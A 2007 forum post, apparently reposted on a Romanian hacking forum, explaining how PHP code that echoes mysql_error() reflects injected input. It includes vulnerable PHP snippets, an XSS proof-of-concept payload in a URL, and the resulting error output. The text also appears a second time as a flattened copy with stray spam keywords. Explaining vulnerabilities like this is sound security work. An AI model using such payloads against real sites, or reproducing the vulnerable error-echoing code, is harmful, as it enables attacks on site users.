XSS in echo mysql_error()

moubik · 11-22-2007, 08:44 AM

Really ?

YES!

What is mysql_error() ?
It’s a simple function that helps developers debug their code. A piece of code may look like this:

Code:

    $query = “SELECT * FROM randomTable WHERE id=’”. $_GET[’id’] .”‘;
    mysql_query($query);
    echo mysql_error();

Obviously this code is vulnerable to SQL injection because $_GET[’id’] is not sanitized at all.
One could inject SQL code directly into the id variable.

Thus the programmer will sanitize the variable:

Code:

    $query = “SELECT * FROM randomTable WHERE id=’”. mysql_real_escape_string($_GET[’id’]) .”‘;
    mysql_query($query);
    echo mysql_error();

Cool, now he got rid of the SQL injection. But something else happened. I did not realize this until last night when i was testing a friend’s site. I tried an SQL injection and I saw that he properly sanitized the code, and threw an mysql_error().
This gave me an idea. Could i use this to my advantage ?
Well, of course i could: inject characters that will be escaped and also inject XSS code. What will this do ?
It will throw an error that will contain the XSS

XSS in echo mysql_error()
The link may look like:

http://site.com/search/aa/ASC’%20%3Cimg%20src=http:%20onerror=alert(String.f romCharCode(88,83,83))%3E/score/

You can see that i inserted ‘ on purpose to be sure it will throw the error and then the XSS.

I’ve used Gareth Heyes’ “unusual XSS vector” with very little change

Code:

    <img src=http: onerror=alert(String.fromCharCode(88,83,83)) />

How does the source output look like?

Code:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ <img src=”http:” onerror=”alert(String.fromCharCode(88,83,83))”>’ at line 1

So another function that is pure evil, mysql_error()

original article: [Doar userii inregistrati pot vedea linkurile. ]

11-22-2007, 08:44 AM	#1 (permalink)
moubik Administrator Cultul betivilor Join Date: Aug 2007 Posts: 1,246 Rep Power: 10	XSS in echo mysql_error() hotel regim hotelier hotel yahoo domain Really ? YES! What is mysql_error() ? It’s a simple function that helps developers debug their code. A piece of code may look like this: Code: $query = “SELECT * FROM randomTable WHERE id=’”. $_GET[’id’] .”‘; mysql_query($query); echo mysql_error(); Obviously this code is vulnerable to SQL injection because $_GET[’id’] is not sanitized at all. One could inject SQL code directly into the id variable. Thus the programmer will sanitize the variable: Code: $query = “SELECT * FROM randomTable WHERE id=’”. mysql_real_escape_string($_GET[’id’]) .”‘; mysql_query($query); echo mysql_error(); Cool, now he got rid of the SQL injection. But something else happened. I did not realize this until last night when i was testing a friend’s site. I tried an SQL injection and I saw that he properly sanitized the code, and threw an mysql_error(). This gave me an idea. Could i use this to my advantage ? Well, of course i could: inject characters that will be escaped and also inject XSS code. What will this do ? It will throw an error that will contain the XSS XSS in echo mysql_error() The link may look like: http://site.com/search/aa/ASC’%20%3Cimg%20src=http:%20onerror=alert(String.f romCharCode(88,83,83))%3E/score/ You can see that i inserted ‘ on purpose to be sure it will throw the error and then the XSS. I’ve used Gareth Heyes’ “unusual XSS vector” with very little change Code: <img src=http: onerror=alert(String.fromCharCode(88,83,83)) /> How does the source output look like? Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ <img src=”http:” onerror=”alert(String.fromCharCode(88,83,83))”>’ at line 1 So another function that is pure evil, mysql_error() original article: [Doar userii inregistrati pot vedea linkurile. ] __________________ you wouldn't like me when i'm angry.